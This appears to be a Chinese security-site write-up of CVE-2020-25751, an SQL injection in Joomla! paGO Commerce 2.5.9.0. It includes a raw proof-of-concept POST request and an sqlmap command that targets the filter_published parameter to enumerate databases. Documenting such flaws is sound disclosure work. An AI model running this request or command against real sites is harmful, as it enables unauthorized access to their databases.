(CVE-2020-25751)Joomla!_paGO_Commerce_2.5.9.0_sql注入漏洞

# (CVE-2020-25751)Joomla! paGO Commerce 2.5.9.0 sql注入漏洞

===================

一、漏洞简介
————

Joomla!是美国Open Source
Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。

Joomla! paGO Commerce 插件
2.5.9.0版本存在sql注入漏洞。该漏洞源于`administrator/index.php?option=com_pago&view=comments filter_published`
参数。攻击者可利用该漏洞执行非法SQL命令。

二、漏洞影响
————

Joomla! paGO Commerce 2.5.9.0

三、复现过程
————

POST /joomla/administrator/index.php HTTP/1.1
Host: www.0-sec.org:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://localhost
Connection: close
Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1

filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1

**sqlmap poc**:

`sqlmap -r www.0-sec.org –dbs –risk=3 –level=5 –random-agent -p filter_published`

参考链接
——–

> https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容